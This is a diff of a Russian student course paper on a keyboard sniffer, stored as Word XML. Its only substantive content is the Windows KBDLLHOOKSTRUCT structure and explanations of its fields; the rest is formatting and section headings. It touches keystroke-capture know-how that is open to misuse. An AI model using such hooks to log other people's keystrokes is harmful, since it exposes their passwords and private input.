+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD  time</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    ULONG_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">PTR  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dwExtraInfo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>} KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>vkCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает код виртуальной клавиши. Код должен быть значением в диапазоне 1 - 254.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>scanCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает аппаратный код опроса</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> клавиатуры (скэн-код) клавиши.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>lags</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает флажок дополнительной клавиши, флажок события ввода, контекстный код и флажок переходного состояния.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>t</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает отмет</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ку времени для этого сообщения.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>dwExtraInfo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>у</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>станавливает дополнительную информацию, связанную с сообщением.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:bookmarkStart w:id="2" w:name="_Toc414805630"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -2788,7 +7950,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Заключение</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="2"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2797,16 +7959,17 @@
           <w:b/>
           <w:bCs/>
           <w:sz w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="en-US"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2821,11 +7984,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:lang w:eastAsia="en-US"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="5" w:name="_Toc414805631"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc414805631"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -2835,7 +7998,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>Список литературы</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2867,9 +8030,169 @@
 </w:document>
 </file>
 
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:abstractNum w:abstractNumId="0">
+    <w:nsid w:val="1BA963B6"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="F1C6DF66"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="2"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:b/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1207" w:hanging="675"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1424" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1956" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2128" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2660" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2832" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3364" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3896" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1">
     <w:nsid w:val="213105F8"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="66925C16"/>
@@ -3018,7 +8341,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1">
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="3B9C1A0E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="87C2B492"/>
@@ -3158,7 +8481,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="4CC972A5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="EE0A7D28"/>
@@ -3271,14 +8594,142 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:nsid w:val="6AF50F13"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="F1C6DF66"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="2"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:b/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1207" w:hanging="675"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1424" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1956" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2128" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2660" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2832" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3364" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3896" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="3">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="2">
-    <w:abstractNumId w:val="2"/>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="3">
-    <w:abstractNumId w:val="0"/>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="4"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3727,7 +9178,6 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -3976,6 +9426,60 @@
       <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
       <w:sz w:val="26"/>
       <w:szCs w:val="26"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="af0">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="af1"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00E47FA2"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4677"/>
+        <w:tab w:val="right" w:pos="9355"/>
+      </w:tabs>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
+    <w:name w:val="Верхний колонтитул Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="af0"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00E47FA2"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="af2">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="af3"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00E47FA2"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4677"/>
+        <w:tab w:val="right" w:pos="9355"/>
+      </w:tabs>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="af3">
+    <w:name w:val="Нижний колонтитул Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="af2"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="00E47FA2"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
       <w:lang w:eastAsia="ru-RU"/>
     </w:rPr>
   </w:style>
@@ -4248,7 +9752,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{CCEA1A86-C883-4E13-867B-0C09B54478D2}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9B2B2808-9A74-4ABF-9D36-FD154793B96C}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -79,7 +79,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -99,15 +98,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>ИНФОРМАТИКИ</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> И РАДИОЭЛЕКТРОНИКИ</w:t>
+        <w:t>ИНФОРМАТИКИ И РАДИОЭЛЕКТРОНИКИ</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -214,7 +205,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Системное программное обеспечение </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -222,7 +212,6 @@
         </w:rPr>
         <w:t>вычислительных  машин</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -411,21 +400,12 @@
         </w:rPr>
         <w:t>«</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Сниффер</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> клавиатуры</w:t>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Сниффер клавиатуры</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -527,7 +507,6 @@
         </w:rPr>
         <w:t xml:space="preserve">                                </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="32"/>
@@ -535,7 +514,6 @@
         </w:rPr>
         <w:t>Студент:  гр.</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
